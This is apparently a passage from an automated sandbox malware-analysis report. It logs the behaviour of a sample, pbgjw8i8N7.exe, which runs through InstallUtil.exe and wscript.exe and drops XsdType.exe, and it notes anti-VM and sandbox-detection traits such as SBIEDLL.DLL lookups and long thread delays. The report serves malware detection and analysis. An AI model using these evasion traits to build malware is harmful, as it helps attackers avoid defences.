                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: pbgjw8i8N7.exe PID: 1988, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: XsdType.exe PID: 6732, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1331701274.0000000002971000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1463433201.0000000002A11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeMemory allocated: E70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeMemory allocated: 2970000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeMemory allocated: 27A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2890000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2B20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2A30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeMemory allocated: E00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeMemory allocated: 2A10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeMemory allocated: 2860000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2240000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 23C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 43C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599844Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599719Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599594Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596970Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596846Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596719Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595454Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595079Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594953Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594842Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594730Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594623Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594458Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594059Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593890Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593781Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593671Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593555Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599891Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599780Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599672Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599563Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599438Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599313Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599203Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598969Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596235Jump to behavior
